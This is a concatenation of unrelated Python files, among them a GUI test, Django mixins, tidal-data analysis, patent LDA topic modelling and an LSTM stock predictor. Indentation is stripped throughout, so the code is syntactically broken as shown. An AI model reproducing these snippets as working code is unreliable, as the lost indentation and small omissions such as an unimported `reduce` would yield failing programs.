@v.gui.connect_
def on_spike_click(channel_id=None, spike_id=None, cluster_id=None):
_clicked.append((channel_id, spike_id, cluster_id))
v.events.key_press(key=keys.Key('Control'))
v.events.mouse_press(pos=(400., 200.), button=1, modifiers=(keys.CONTROL,))
v.events.key_release(key=keys.Key('Control'))
assert _clicked == [(1, 4, 1)]
# qtbot.stop()
gui.close()
|
from jsonschema import Draft4Validator, Draft3Validator
from jsonschema.validators import validator_for
from .http.response import JsonResponseBadRequest
class JsonFormMixin(object):
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
if self.request.method in ('POST', 'PUT', 'PATCH') and not self.request.POST \
and hasattr(self.request, 'json') and self.request.json:
kwargs['data'] = self.request.json
return kwargs
def form_invalid(self, form):
errors = {
field: [error for data in error_list.data for error in data]
for field, error_list in form.errors.items()
}
return JsonResponseBadRequest({'errors': errors})
class JsonSchemaPayloadMixin(object):
request_schema = {}
def dispatch(self, request, *args, **kwargs):
"""
:param django.core.handlers.wsgi.WSGIRequest request:
:param args:
:param kwargs:
:return:
"""
if request.method in ('POST', 'PUT', 'PATCH'):
if self.request_schema:
validator_cls = validator_for(self.request_schema)
validator = validator_cls(self.request_schema) # type: Draft4Validator or Draft3Validator
errors = [str(error) for error in validator.iter_errors(request.json)]
if errors:
return JsonResponseBadRequest({'errors': errors})
return super().dispatch(request, *args, **kwargs)
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""Test lvmmodel.install.
"""
from os.path import abspath, dirname
import unittest
from .. import __version__ as lvmmodel_version
from ..install import default_install_dir, svn_export, install
class TestInstall(unittest.TestCase):
"""Test lvmmodel.install.
"""
def test_default_install_dir(self):
"""Test setting default install directory.
"""
d1 = default_install_dir()
d2 = dirname(dirname(dirname(dirname(dirname(dirname(__file__))))))
self.assertEqual(abspath(d1), abspath(d2))
def test_svn_export(self):
"""Test svn export command.
"""
base_url = "https://desi.lbl.gov/svn/code/lvmmodel/{0}/data"
cmd = svn_export()
self.assertEqual(cmd[2], base_url.format('trunk'))
cmd = svn_export('trunk')
self.assertEqual(cmd[2], base_url.format('trunk'))
cmd = svn_export('branches/v3')
self.assertEqual(cmd[2], base_url.format('branches/v3'))
cmd = svn_export('1.2.3')
self.assertEqual(cmd[2], base_url.format('tags/1.2.3'))
def test_install(self):
"""Test the install function.
"""
pass
def test_suite():
"""Allows testing of only this module with the command::
python setup.py test -m <modulename>
"""
return unittest.defaultTestLoader.loadTestsFromName(__name__)
|
"""
Helpers for evaluating models.
"""
from .reptile import ReptileForFederatedData
from mlmi.reptile.reptile_original.variables import weight_decay
# pylint: disable=R0913,R0914
def evaluate(sess,
model,
train_dataloaders,
test_dataloaders,
num_classes=5,
eval_inner_iters=50,
transductive=False,
weight_decay_rate=1,
reptile_fn=ReptileForFederatedData):
"""
Evaluate a model on a dataset.
"""
reptile = reptile_fn(
session=sess,
transductive=transductive,
pre_step_op=weight_decay(weight_decay_rate)
)
total_correct = 0
for train_dl, test_dl in zip(
train_dataloaders.values(), test_dataloaders.values()
):
total_correct += reptile.evaluate(
train_data_loader=train_dl,
test_data_loader=test_dl,
input_ph=model.input_ph,
label_ph=model.label_ph,
minimize_op=model.minimize_op,
predictions=model.predictions,
inner_iters=eval_inner_iters
)
return total_correct / (len(train_dataloaders) * num_classes)
|
"""
Given positive integers {x_1, ..., x_n}, is there a subset that sums to k
NP complete problem
Links:
https://en.wikipedia.org/wiki/Subset_sum_problem
https://stackoverflow.com/a/45427013/9518712
https://cs.stackexchange.com/a/49632
https://github.com/saltycrane/subset-sum
https://stackoverflow.com/a/41570549/9518712
"""
from itertools import chain, combinations
def subset_naive(arr, k: int):
"""sum all subsets
Time complexity: O(n2^n)
"""
powerset = chain.from_iterable(combinations(arr, i) for i in range(1, len(arr) + 1))
return any(sum(subset) == k for subset in powerset)
def subset_pseudopoly(arr, k: int) -> bool:
"""
Pseudo polynomial time using dynamic programming
Time complexity: O(nk)
"""
possible = [False] * (k + 1)
possible[0] = True
for elem in arr:
for i in range(k - elem, -1, -1):
if possible[i]:
possible[i + elem] = True
return possible[k]
# def subset_approx(arr, k, err=0.01):
# """
# The algorithm is polynomial time because the lists S, T and U always remain of
# size polynomial in N and 1/c and, as long as they are of polynomial size,
# all operations on them can be done in polynomial time.
# """
# s = [0]
# for x in arr:
# t = [x + y for y in s]
# u = t + s
# u = sorted(u)
# y = u[0] # min value of u
# s = [y]
# for z in u:
# if y + err * k / len(arr) < z <= k:
# y = z
# s.append(z)
# for x in s:
# if (1 - err) * k <= x <= k:
# return True
# return False
def test():
"""run test cases"""
test_cases = (
([], 1, False),
([1], 1, True),
([1, 2, 3, 1], 4, True),
([4, 2, 3, 4], 8, True),
([2, 7, 9], 12, False),
([267, 961, 1153, 1000, 1922, 493, 1598, 869, 1766, 1246], 5842, True),
)
for *arg, expected in test_cases:
assert subset_naive(*arg) == expected
assert subset_pseudopoly(*arg) == expected
# assert subset_approx(*arg) == expected
if __name__ == "__main__":
test()
|
from __future__ import division
import numpy as np
import pandas as pd
import netCDF4 as nc
from datetime import datetime, timedelta
import cPickle as pickle
import sys
sys.path.append('/home/wesley/github/UTide/')
from utide import ut_solv
import scipy.io as sio
from stationClass import station
def mjd2num(x):
y = x + 678942
return y
def closest_point(points, lon, lat):
point_list = np.array([lon,lat]).T
closest_dist = ((point_list[:, 0] - points[:, 0, None])**2 +
(point_list[:, 1] - points[:, 1, None])**2)
closest_point_indexes = np.argmin(closest_dist, axis=1)
return closest_point_indexes
def datetime2matlabdn(dt):
# ordinal = dt.toordinal()
mdn = dt + timedelta(days=366)
frac = (dt-datetime(dt.year, dt.month, dt.day, 0, 0, 0)).seconds / \
(24.0 * 60.0 * 60.0)
return mdn.toordinal() + frac
def tideGauge(datafiles, Struct):
dgFilename = '/array/home/rkarsten/common_tidal_files/data/observed/DG/TideGauge/DigbyWharf_015893_20140115_2221_Z.mat'
gpFilename = '/array/home/rkarsten/common_tidal_files/data/observed/GP/TideGauge/Westport_015892_20140325_1212_Z.mat'
dgtg = sio.loadmat(dgFilename, struct_as_record=False, squeeze_me=True)
gptg = sio.loadmat(gpFilename, struct_as_record=False, squeeze_me=True)
ut_constits = ['M2','S2','N2','K2','K1','O1','P1','Q1']
print 'Westport TideGauge'
coef_gptg = ut_solv(gptg['RBR'].date_num_Z,
(gptg['RBR'].data-np.mean(gptg['RBR'].data)), [],
gptg['RBR'].lat, cnstit=ut_constits, notrend=True,
rmin=0.95, method='ols', nodiagn=True, linci=True,
ordercnstit='frq')
print 'DigbyWharf TideGauge'
coef_dgtg = ut_solv(dgtg['RBR'].date_num_Z,
(dgtg['RBR'].data-np.mean(dgtg['RBR'].data)), [],
dgtg['RBR'].lat, cnstit=ut_constits, notrend=True,
rmin=0.95, method='ols', nodiagn=True, linci=True,
ordercnstit='frq')
struct = np.array([])
for filename in datafiles:
print filename
data = nc.Dataset(filename, 'r')
lat = data.variables['lat'][:]
lon = data.variables['lon'][:]
time = data.variables['time'][:]
time = mjd2num(time)
tg_gp_id = np.argmin(np.sqrt((lon-gptg['RBR'].lon)**2+(lat-gptg['RBR'].lat)**2))
tg_dg_id = np.argmin(np.sqrt((lon-dgtg['RBR'].lon)**2+(lat-dgtg['RBR'].lat)**2))
#elgp = data.variables['zeta'][tg_gp_id, :]
#eldg = data.variables['zeta'][tg_dg_id, :]
elgp = data.variables['zeta'][:, tg_gp_id]
eldg = data.variables['zeta'][:, tg_dg_id]
coef_dg = ut_solv(time, eldg, [], dgtg['RBR'].lat, cnstit=ut_constits,
notrend=True, rmin=0.95, method='ols', nodiagn=True,
linci=True, ordercnstit='frq')
coef_gp = ut_solv(time, elgp, [], gptg['RBR'].lat, cnstit=ut_constits,
notrend=True, rmin=0.95, method='ols', nodiagn=True,
linci=True, ordercnstit='frq')
Name = filename.split('/')[-3]
Name = '2012_run'
print Name
obs_loc = {'name':Name, 'type':'TideGauge',
'mod_time':time, 'dg_time':dgtg['RBR'].date_num_Z,
'gp_time':gptg['RBR'].date_num_Z,
'lon':lon, 'lat':lat,
'dg_tidegauge_harmonics': coef_dgtg,
'gp_tidegauge_harmonics':coef_gptg,
'dg_mod_harmonics': coef_dg,
'gp_mod_harmonics': coef_gp,
'dg_tg_data':dgtg['RBR'].data,
'gp_tg_data':gptg['RBR'].data,
'eldg':eldg, 'elgp':elgp}
struct = np.hstack((struct, obs_loc))
Struct[Name] = np.hstack((Struct[Name], struct))
#pickle.dump(struct, open("structADCP.p", "wb"))
return Struct
def adcp(datafiles, debug=False):
if debug:
adcpFilename = '/home/wesley/github/karsten/adcp/testADCP.txt'
else:
adcpFilename = '/array/home/107002b/github/karsten/adcp/acadia_dngrid_adcp_2012.txt'
#adcpFilename = '/home/wesleyb/github/karsten/adcp/dngrid_adcp_2012.txt'
adcp = pd.read_csv(adcpFilename)
for i,v in enumerate(adcp['Latitude']):
path = adcp.iloc[i, -1]
if path != 'None':
print adcp.iloc[i, 0]
#print lonlat[i,1], uvnodell[ii,1]
ADCP = pd.read_csv(path, index_col=0)
ADCP.index = pd.to_datetime(ADCP.index)
adcpTime = np.empty(ADCP.index.shape)
for j, jj in enumerate(ADCP.index):
adcpTime[j] = datetime2matlabdn(jj)
adcpCoef = ut_solv(adcpTime, ADCP['u'].values,
ADCP['v'].values, v,
cnstit='auto', rmin=0.95, notrend=True,
method='ols', nodiagn=True, linci=True,
conf_int=True)
adcpData = adcpCoef
obs = pd.DataFrame({'u':ADCP['u'].values, 'v':ADCP['v'].values})
Struct = {}
for filename in datafiles:
print filename
data = nc.Dataset(filename, 'r')
#x = data.variables['x'][:]
#y = data.variables['y'][:]
lon = data.variables['lon'][:]
lat = data.variables['lat'][:]
lonc = data.variables['lonc'][:]
latc = data.variables['latc'][:]
ua = data.variables['ua']
va = data.variables['va']
time = data.variables['time'][:]
#trinodes = data.variables['nv'][:]
time = mjd2num(time)
lonlat = np.array([adcp['Longitude'], adcp['Latitude']]).T
#index = closest_point(lonlat, lon, lat)
index = closest_point(lonlat, lonc, latc)
adcpData = pd.DataFrame()
runData = pd.DataFrame()
Name = filename.split('/')[-3]
Name = '2012_run'
print Name
struct = np.array([])
for i, ii in enumerate(index):
path = adcp.iloc[i, -1]
if path != 'None':
print adcp.iloc[i, 0]
coef = ut_solv(time, ua[:, ii], va[:, ii], lonlat[i, 1],
cnstit='auto', rmin=0.95, notrend=True,
method='ols', nodiagn=True, linci=True,
conf_int=True)
runData = coef
mod = pd.DataFrame({'ua':ua[:, ii], 'va':va[:, ii]})
obs_loc = {'name':adcp.iloc[i,0], 'type':'ADCP', 'lat':lonlat[i,-1],
'lon':lonlat[0,0], 'obs_timeseries':obs,
'mod_timeseries':mod, 'obs_time':adcpTime,
'mod_time':time,'speed_obs_harmonics':adcpData,
'speed_mod_harmonics':runData}
struct = np.hstack((struct, obs_loc))
Struct[Name] = struct
return Struct
def main(debug=False):
if debug:
datafiles = ['/array/data1/rkarsten/dncoarse_bctest_old/output/dn_coarse_0001.nc',
'/array/data1/rkarsten/dncoarse_bctest/output/dn_coarse_0001.nc']
#datafiles = ['/home/wesley/ncfiles/smallcape_force_0001.nc']
else:
# datafiles = ['/array/data1/rkarsten/dncoarse_bctest_old/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest2/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest_all/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest_EC/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest_timeseries/output/dn_coarse_0001.nc']
#datafiles = ['/array2/data3/rkarsten/dncoarse_3D/output2/dn_coarse_station_timeseries.nc']
# datafiles = ['/EcoII/EcoEII_server_data_tree/data/simulated/FVCOM/dncoarse/calibration/bottom_roughness/0.0015/output/dngrid_0001.nc',
# '/EcoII/EcoEII_server_data_tree/data/simulated/FVCOM/dncoarse/calibration/bottom_roughness/0.0020/output/dngrid_0001.nc',
# '/EcoII/EcoEII_server_data_tree/data/simulated/FVCOM/dncoarse/calibration/bottom_roughness/0.0025/output/dngrid_0001.nc',
# '/EcoII/EcoEII_server_data_tree/data/simulated/FVCOM/dncoarse/calibration/bottom_roughness/0.0030/output/dngrid_0001.nc']
#
datafiles = ['/array/home/116822s/2012_run.nc']
#'/array/data1/rkarsten/dncoarse_stationtest/output/dn_coarse_0001.nc']
saveName = 'struct2012_run.p'
Struct = adcp(datafiles, debug=False)
if debug:
pickle.dump(Struct, open("structADCP.p", "wb"))
Struct = tideGauge(datafiles, Struct)
pickle.dump(Struct, open(saveName, "wb"))
return Struct
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 18 11:49:00 2021
@author: tmlab
"""
#%% 01. package and data load
if __name__ == '__main__':
import pickle
import spacy
import re
from nltk.corpus import stopwords
import pandas as pd
import numpy as np
from gensim.models import CoherenceModel
from gensim.corpora import Dictionary
from gensim.models.ldamulticore import LdaMulticore
import warnings
from sentence_transformers import SentenceTransformer
from collections import Counter
import xlsxwriter
directory = 'D:/OneDrive - 아주대학교/db/patent/'
with open(directory + 'DT_211118.pkl', 'rb') as fr :
data = pickle.load(fr)
# data_sample = data.sample(500, random_state = 12345).reset_index(drop = 1)
data_sample = data
data_sample['TAC'] = data_sample['title'] + ' ' + data_sample['abstract'] + ' ' + data_sample['claims_rep']
data_sample['year'] = data_sample['date'].apply(lambda x : x[0:4])
# data_sample.
#%% 02. preprocessing and filtering
c = Counter(data_sample['year']) #2016 ~ 2020
year_list = [k for k,v in c.items() if v >= 30]
stopwords_nltk = set(stopwords.words('english'))
data_sample = data_sample.loc[data_sample['year'] >=min(year_list) , :].reset_index(drop = 1)
data_sample = data_sample.loc[data_sample['TAC'].str.split().str.len() >= 100 , :].reset_index(drop = 1)
nlp = spacy.load("en_core_web_sm")
directory = 'D:/OneDrive - 아주대학교/db/dictionary/'
with open(directory + 'stopwords_uspto.txt') as f:
stopwords_uspto = [line.rstrip() for line in f]
stopwords_uspto.append('-PRON-')
data_sample['TAC_nlp'] = [nlp(i) for i in data_sample['TAC']]
# get keyword
data_sample['TAC_keyword'] = [[token.lemma_ for token in doc] for doc in data_sample['TAC_nlp']] # lemma
data_sample['TAC_keyword'] = [[token for token in doc if len(token) > 2] for doc in data_sample['TAC_keyword']] # 길이기반 제거
data_sample['TAC_keyword'] = [[token for token in doc if not token.isdigit() ] for doc in data_sample['TAC_keyword']] #숫자제거
data_sample['TAC_keyword'] = [[re.sub(r"[^a-zA-Z0-9-]","",token) for token in doc ] for doc in data_sample['TAC_keyword']] #특수문자 교체
data_sample['TAC_keyword'] = [[token for token in doc if len(token) > 2] for doc in data_sample['TAC_keyword']] # 길이기반 제거
data_sample['TAC_keyword'] = [[token for token in doc if token not in stopwords_uspto] for doc in data_sample['TAC_keyword']] # 길이기반 제거
data_sample['TAC_keyword'] = [[token for token in doc if token not in stopwords_nltk] for doc in data_sample['TAC_keyword']] # 길이기반 제거
data_sample['cpc_class'] = ''
data_sample['cpc_subclass'] = ''
data_sample['cpc_group'] = ''
for idx,row in data_sample.iterrows() :
print(idx)
cpc_list = data_sample['cpc_list'][idx]
data_sample['cpc_group'][idx] = [i for i in cpc_list if len(i) > 5]
data_sample['cpc_class'][idx] = [i for i in cpc_list if len(i) == 3]
data_sample['cpc_subclass'][idx] = [i for i in cpc_list if len(i) == 4]
#%% 03. filtering text and cpc
directory = 'D:/OneDrive - 아주대학교/db/patent/CPC/'
with open(directory + 'CPC_definition.pkl', 'rb') as fr:
CPC_definition = pickle.load(fr)
def get_CPC_Counter(df,col) :
cpc_list = df[col].tolist()
cpc_list = sum(cpc_list, [])
c = Counter(cpc_list)
# c = {k: v for k, v in sorted(c.items(), key=lambda item: item[1], reverse=True)}
return(c)
cpc_class = get_CPC_Counter(data_sample, 'cpc_class')
cpc_subclass = get_CPC_Counter(data_sample,'cpc_subclass')
cpc_group = get_CPC_Counter(data_sample,'cpc_group')
class_list = [k for k,v in cpc_class.items() if v >= len(data_sample) * 0.05]
class_list = [i for i in class_list if i in CPC_definition.keys()]
subclass_list = [k for k,v in cpc_subclass.items() if v >= len(data_sample) * 0.025]
subclass_list = [i for i in subclass_list if i[0:-1] in class_list]
subclass_list = [i for i in subclass_list if i in CPC_definition.keys()]
group_list = [k for k,v in cpc_group.items() if v >= len(data_sample) * 0.0125]
group_list = [i for i in group_list if i[0:4] in subclass_list]
group_list = [i for i in group_list if i in CPC_definition.keys()]
#%% 04. encoding cpc and keyword
# conda install -c conda-forge ipywidgets
model = SentenceTransformer('sentence-transformers/multi-qa-mpnet-base-dot-v1')
result_df = pd.DataFrame()
def cosine(u, v):
return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))
encoded_CPC = {}
for i in subclass_list :
encoded_CPC[i] = model.encode(CPC_definition[i])
for i in class_list :
encoded_CPC[i] = model.encode(CPC_definition[i])
for i in group_list :
encoded_CPC[i] = model.encode(CPC_definition[i])
with open(directory + 'input/encoded_CPC.pkl', 'wb') as fw:
pickle.dump(encoded_CPC, fw)
# with open(directory + 'input/encoded_CPC.pkl', 'rb') as fr:
# encoded_CPC = pickle.load(fr)
#%%
texts = data_sample['TAC_keyword']
dct = Dictionary(texts)
dct.filter_extremes(no_below = 10,
no_above=0.1)
keyword_list = dct.token2id.keys()
text_list = keyword_list
standard = {}
encoded_text = {}
level = 1
for CPC in [class_list, subclass_list, group_list] :
total_df = pd.DataFrame()
for text in text_list :
if text in encoded_text.keys() :
text_embedding = encoded_text[text]
else :
text_embedding = model.encode(text)
encoded_text[text] = text_embedding
sim_list = []
for cpc_text in CPC :
cpc_embedding = encoded_CPC[cpc_text]
sim = cosine(text_embedding, cpc_embedding)
sim_list.append(sim)
mean = np.mean(sim_list)
var = np.var(sim_list)
total_df = total_df.append([[mean,var]], ignore_index=1)
total_df.columns = ['MEAN' , 'VAR']
MEAN = np.mean(total_df['MEAN'])
VAR = np.mean(total_df['VAR'])
standard[level] = (MEAN, VAR)
level +=1
#%% 05. classify keyword
level = 1
text_classification_df = pd.DataFrame()
for CPC in [class_list, subclass_list, group_list] :
MEAN = standard[level][0]
VAR = standard[level][1]
SD = np.sqrt(VAR)
result = {}
for text in keyword_list :
# CPC = class_list
if text in result.keys() :
continue
else :
text_embedding = encoded_text[text]
sim_list = []
for cpc_text in CPC :
cpc_embedding = encoded_CPC[cpc_text]
sim = cosine(text_embedding, cpc_embedding)
sim_list.append(sim)
mean = np.mean(sim_list)
var = np.var(sim_list)
if (mean >= MEAN) & (var >= VAR) :
result[text] = 'DEFINED_SEPERATED'
elif (mean >= MEAN) & (var < VAR) :
result[text] = 'DEFINED'
else :
result[text] = 'UNCLASSIFIED'
level +=1
text_classification_df = text_classification_df.append(result, ignore_index=1 )
text_classification_df = text_classification_df.transpose()
text_classification_df.columns = ['class', 'subclass', 'group']
#%% 06. LDA tunning
warnings.filterwarnings('ignore')
# dct = Dictionary(texts)
# dct.filter_extremes(no_below = 10,
# no_above=0.1)
corpus = [dct.doc2bow(text) for text in texts]
def compute_coherence_values(corpus, dictionary, texts, k, a, b):
lda_model = LdaMulticore(corpus=corpus,
id2word=dictionary,
num_topics=k,
random_state=100,
chunksize=100,
passes=10,
alpha=a,
eta=b,
workers=15,
)
coherence_model_lda = CoherenceModel(model=lda_model,
texts=texts,
dictionary=dictionary,
coherence='u_mass')
return coherence_model_lda.get_coherence()
grid = {}
grid['Validation_Set'] = {}
# Topics range #수정
min_topics = 10
max_topics = 51
step_size = 5
topics_range = range(min_topics, max_topics, step_size)
# Alpha parameter
alpha = list(np.arange(0.01, 1, 0.3))
# alpha = [0.01, 0.05, 0.1, 1]
alpha.append('symmetric')
alpha.append('asymmetric')
# Beta parameter
beta = list(np.arange(0.01, 1, 0.3))
# beta = [0.01, 0.05, 0.1, 1]
beta.append('symmetric')
# Validation sets
num_of_docs = len(corpus)
corpus_sets = [# gensim.utils.ClippedCorpus(corpus, num_of_docs*0.25),
# gensim.utils.ClippedCorpus(corpus, num_of_docs*0.5),
# gensim.utils.ClippedCorpus(corpus, num_of_docs*0.75),
corpus]
corpus_title = ['100% Corpus']
model_results = {'Validation_Set': [],
'Topics': [],
'Alpha': [],
'Beta': [],
'Coherence': []
}
# Can take a long time to run
if 1 == 1:
cnt = 0
# iterate through validation corpuses
for i in range(len(corpus_sets)):
# iterate through number of topics
for k in topics_range:
# iterate through alpha values
for a in alpha:
# iterare through beta values
for b in beta:
# get the coherence score for the given parameters
cv = compute_coherence_values(corpus=corpus_sets[i],
dictionary=dct,
texts = texts,
k=k,
a=a,
b=b)
# Save the model results
model_results['Validation_Set'].append(corpus_title[i])
model_results['Topics'].append(k)
model_results['Alpha'].append(a)
model_results['Beta'].append(b)
model_results['Coherence'].append(cv)
cnt +=1
print("전체 {} 중에서 {} ".format(len(alpha) *len(beta) *len(topics_range),cnt))
pd.DataFrame(model_results).to_csv(directory + 'lda_tuning_results.csv', index=False)
#%% 07. LDA result handling #수정
lda_model = LdaMulticore(corpus=corpus,
id2word=dct,
num_topics= 50,
random_state=100,
chunksize=100,
passes=10,
alpha=0.91,
eta=0.91,
workers=15
)
#%% 08. calculate freshness
topic_word_df = pd.DataFrame()
for i in range(0, lda_model.num_topics) :
temp = lda_model.show_topic(i, 1000)
DICT = {}
for tup in temp :
DICT[tup[0]] = tup[1]
topic_word_df = topic_word_df.append(DICT, ignore_index =1)
topic_word_df = topic_word_df.transpose()
# freshness
topic_fresh_dict = dict.fromkeys(range(0,50), 0)
for idx, row in topic_word_df.iterrows() :
temp = text_classification_df.loc[[row.name]].iloc[0,:].tolist()
if all(i== 'UNCLASSIFIED' for i in temp ) :
for col in topic_word_df.columns :
prob = row[col]
if str(prob) != 'nan' :
topic_fresh_dict[col] += prob
topic_fresh_df = pd.DataFrame(topic_fresh_dict.items())
topic_fresh_df.columns = ['topic', 'prob']
#%% 09. calculate volumn & cagr
topic_doc_df = pd.DataFrame(columns = range(0, lda_model.num_topics))
for corp in corpus :
temp = lda_model.get_document_topics(corp)
DICT = {}
for tup in temp :
DICT[tup[0]] = tup[1]
topic_doc_df = topic_doc_df.append(DICT, ignore_index=1)
volumn_df = topic_doc_df.apply(np.sum)
#%% get CAGR
topic_doc_df['year'] = data_sample['year']
topic_doc_df['title'] = data_sample['title']
#%%
topic_year_df = pd.DataFrame()
for col in range(0, lda_model.num_topics) :
grouped = topic_doc_df[col].groupby(topic_doc_df['year'])
DICT = grouped.sum()
topic_year_df = topic_year_df.append(DICT, ignore_index=1)
topic_year_df = topic_year_df.transpose()
#%% saving result
import xlsxwriter
# directory = 'C:/Users/tmlab/Desktop/작업공간/'
writer = pd.ExcelWriter(directory + 'LDA_results.xlsx',
engine='xlsxwriter')
topic_word_df.to_excel(writer , sheet_name = 'topic_word', index = 1)
topic_fresh_df.to_excel(writer , sheet_name = 'topic_fresh', index = 1)
topic_doc_df.to_excel(writer , sheet_name = 'topic_doc', index = 1)
volumn_df.to_excel(writer , sheet_name = 'volumn', index = 1)
topic_year_df.to_excel(writer , sheet_name = 'volumn_year', index = 1)
topic_year_df.to_excel(writer , sheet_name = 'volumn_year', index = 1)
writer.save()
writer.close()
#%% 응용 1
topics = lda_model.show_topic(26)
for topic in topics:
print(topic)
#%% 응용 2
for idx, topic_list in enumerate(lda_model[corpus]):
# if idx==5: break
print(idx,'번째 문서의 topic 비율은',topic_list)
#%% 응용 3 https://wikidocs.net/30708
def make_topictable_per_doc(ldamodel, corpus):
topic_table = pd.DataFrame()
# 몇 번째 문서인지를 의미하는 문서 번호와 해당 문서의 토픽 비중을 한 줄씩 꺼내온다.
for i, topic_list in enumerate(ldamodel[corpus]):
doc = topic_list[0] if ldamodel.per_word_topics else topic_list
doc = sorted(doc, key=lambda x: (x[1]), reverse=True)
# 각 문서에 대해서 비중이 높은 토픽순으로 토픽을 정렬한다.
# EX) 정렬 전 0번 문서 : (2번 토픽, 48.5%), (8번 토픽, 25%), (10번 토픽, 5%), (12번 토픽, 21.5%),
# Ex) 정렬 후 0번 문서 : (2번 토픽, 48.5%), (8번 토픽, 25%), (12번 토픽, 21.5%), (10번 토픽, 5%)
# 48 > 25 > 21 > 5 순으로 정렬이 된 것.
# 모든 문서에 대해서 각각 아래를 수행
for j, (topic_num, prop_topic) in enumerate(doc): # 몇 번 토픽인지와 비중을 나눠서 저장한다.
if j == 0: # 정렬을 한 상태이므로 가장 앞에 있는 것이 가장 비중이 높은 토픽
topic_table = topic_table.append(pd.Series([int(topic_num), round(prop_topic,4), topic_list]), ignore_index=True)
# 가장 비중이 높은 토픽과, 가장 비중이 높은 토픽의 비중과, 전체 토픽의 비중을 저장한다.
else:
break
return(topic_table)
topictable = make_topictable_per_doc(lda_model, corpus)
topictable = topictable.reset_index() # 문서 번호을 의미하는 열(column)로 사용하기 위해서 인덱스 열을 하나 더 만든다.
topictable.columns = ['문서 번호', '가장 비중이 높은 토픽', '가장 높은 토픽의 비중', '각 토픽의 비중']
topictable[:10]
topictable.to_csv(directory + 'topictable.csv', index = 0 , encoding = "euc-kr")
#%% 응용 4
import pyLDAvis
import pyLDAvis.gensim_models as gensimvis
pyLDAvis.enable_notebook()
# feed the LDA model into the pyLDAvis instance
lda_viz = gensimvis.prepare(lda_model, corpus, dct)
pyLDAvis.save_html(lda_viz, directory + 'lda_viz.html') |
import setuptools
# with open("README.md", "r") as fh:
# long_description = fh.read()
def find_packages_with_dir(src_base, exclude):
"""Find packages under the given base directory and append their paths.
"""
pkgs = setuptools.find_packages(src_base, exclude)
return {pkg: src_base + '/' + pkg.replace('.', '/') for pkg in pkgs}
pkgs_dir = find_packages_with_dir('src/python', exclude=[])
setuptools.setup(
name="chern",
version="0.2",
author="Ning Sun",
author_email="[email protected]",
description="Chern number calculator for 2D materials",
# long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/atom-sun/chern.git",
# packages=setuptools.find_packages(),
packages=pkgs_dir.keys(),
package_dir=pkgs_dir,
)
|
from django.conf.urls import url, include
from rest_framework_nested import routers
from core.views import PhotoViewSet, UserViewSet
router = routers.DefaultRouter()
router.register(r'photos', PhotoViewSet)
router.register(r'users', UserViewSet)
users_router = routers.NestedSimpleRouter(router, r'users', lookup='user')
users_router.register(r'photos', PhotoViewSet, base_name='user-photos')
urlpatterns = [
url(r'^', include(router.urls)),
url(r'^', include(users_router.urls)),
]
|
rnl = [ { '4' : 'MMMM', '3' : 'MMM', '2' : 'MM', '1' : 'M', '0' : '' }, { '9' : 'CM', '8' : 'DCCC', '7' : 'DCC',
'6' : 'DC', '5' : 'D', '4' : 'CD', '3' : 'CCC', '2' : 'CC', '1' : 'C', '0' : '' }, { '9' : 'XC',
'8' : 'LXXX', '7' : 'LXX', '6' : 'LX', '5' : 'L', '4' : 'XL', '3' : 'XXX', '2' : 'XX', '1' : 'X',
'0' : '' }, { '9' : 'IX', '8' : 'VIII', '7' : 'VII', '6' : 'VI', '5' : 'V', '4' : 'IV', '3' : 'III',
'2' : 'II', '1' : 'I', '0' : '' }]
# Option 1
def number2romannumeral(n):
return ''.join([rnl[x][y] for x, y in zip(range(4), str(n).zfill(4)) if n < 5000 and n > -1])
# Option 2
def number2romannumeral(n):
return reduce(lambda x, y: x + y, map(lambda x, y: rnl[x][y], range(4), str(n).zfill(4))) if -1 < n < 5000 else None
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 18 22:27:05 2019
@author: Rolikasi
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint, TensorBoard
#activate gpu
import tensorflow as tf
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
sess
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
from keras import backend as K
K.tensorflow_backend._get_available_gpus()
data_2 = pd.read_csv('data/Google_stock_price_2.csv')
data_2.drop(['Date'], axis = 1, inplace = True)
data_2['Volume']= data_2['Volume'].astype(float)
training_set = data_2.iloc[:2227, 0:4].values # Using multiple predictors.
dataset_train = data_2.iloc[:2227, 0:4]
#training_set = training_set.as_matrix() # Using multiple predictors.
#dataset_train = pd.read_csv('data/Google_Stock_Price_Train.csv')
#training_set = dataset_train.iloc[:, 1:2].values
#for RNN use normalization
from sklearn.preprocessing import MinMaxScaler, StandardScaler
sc = StandardScaler()
training_set_scaled = sc.fit_transform(training_set)
sc_predict = StandardScaler()
sc_predict.fit_transform(training_set[:,0:1])
# Creating a data structure with 60 timesteps and 1 output
X_train = []
y_train = []
n_future = 20 # Number of days you want to predict into the future
n_past = 60 # Number of past days you want to use to predict the future
for i in range(n_past, len(training_set_scaled) - n_future + 1):
X_train.append(training_set_scaled[i - n_past:i, 0:4])
y_train.append(training_set_scaled[i+n_future-1:i + n_future, 0])
X_train, y_train = np.array(X_train), np.array(y_train)
#Reshaping 3D structure
#X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
#building the RNN
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
regressor = Sequential()
#Adding layers
regressor.add(LSTM(units = 40, return_sequences= True, input_shape = ( n_past, 4)))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units = 40, return_sequences= True))
regressor.add(LSTM(units = 20, return_sequences= False))
regressor.add(Dropout(0.2))
regressor.add(Dense(units = 1))
#compile RNN
regressor.compile(optimizer='adam', loss= 'mean_squared_error')
#fit the RNN to training set
es = EarlyStopping(monitor='val_loss', min_delta=1e-10, patience=17, verbose=1)
rlr = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=5, verbose=1)
